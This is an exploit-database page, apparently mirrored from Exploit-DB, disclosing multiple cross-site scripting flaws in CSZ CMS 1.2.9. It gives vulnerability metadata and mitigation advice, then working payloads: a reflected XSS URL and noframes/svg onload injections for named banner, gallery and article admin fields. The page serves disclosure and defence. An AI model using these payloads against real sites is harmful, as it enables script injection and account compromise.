header-logo
Suggest Exploit
vendor:
CSZ CMS
by:
SunCSR
4.3
CVSS
MEDIUM
Cross-Site Scripting
79
CWE
Product Name: CSZ CMS
Affected Version From: 1.2.9
Affected Version To: 1.2.9
Patch Exists: NO
Related CWE: N/A
CPE: a:cszcms:csz_cms:1.2.9
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: CSZ CMS 1.2.9
2020

CSZ CMS 1.2.9 – Multiple Cross-Site Scripting

CSZ CMS 1.2.9 is vulnerable to multiple Cross-Site Scripting (XSS) attacks. Reflected XSS can be triggered by sending a maliciously crafted URL to the application. Stored XSS can be triggered by an editor account with rights to manage banners and plugins. The malicious payload can be injected into the Name, Note, Album Name, Keyword, Short Description, and Category Name fields.

Mitigation:

Input validation should be performed on all user-supplied data to ensure that it does not contain malicious code. Additionally, the application should be configured to use a Content Security Policy (CSP) to help prevent XSS attacks.
Source

Exploit-DB raw data:

# Exploit Title: CSZ CMS 1.2.9 - Multiple Cross-Site Scripting
# Date: 2020/12/28
# Exploit Author: SunCSR
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://github.com/cskaza/cszcms
# Version: 1.2.9
# Tested on: CSZ CMS 1.2.9

1. Reflected XSS
Go to url http://localhost/pluginabc%22%2Dalert%28origin%29%2D%22abc
<http://localhost/pluginabc%22-alert%28origin%29-%22abc>

2. Stored XSS

Use an editor account with rights to manage banners, plugins.

+ Banner Manager:
    - Add or edit banner:
    Name field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
    Note field: <noframes><p title="</noframes><svg/onload=alert(origin)>">

+ Plugin Manager:
    - Add or edit album(/admin/plugin/gallery):
    Album Name field: <noframes><p
title="</noframes><svg/onload=alert(origin)>">
    Keyword field: <noframes><p title="</noframes><svg/onload=alert(origin)>">
    Short Description field: <noframes><p
title="</noframes><svg/onload=alert(origin)>">

    - Add or edit Category(/admin/plugin/article/):
    Category Name field: <noframes><p
title="</noframes><svg/onload=alert(origin)>">

Navigation

Suggest Exploit

Services By CQR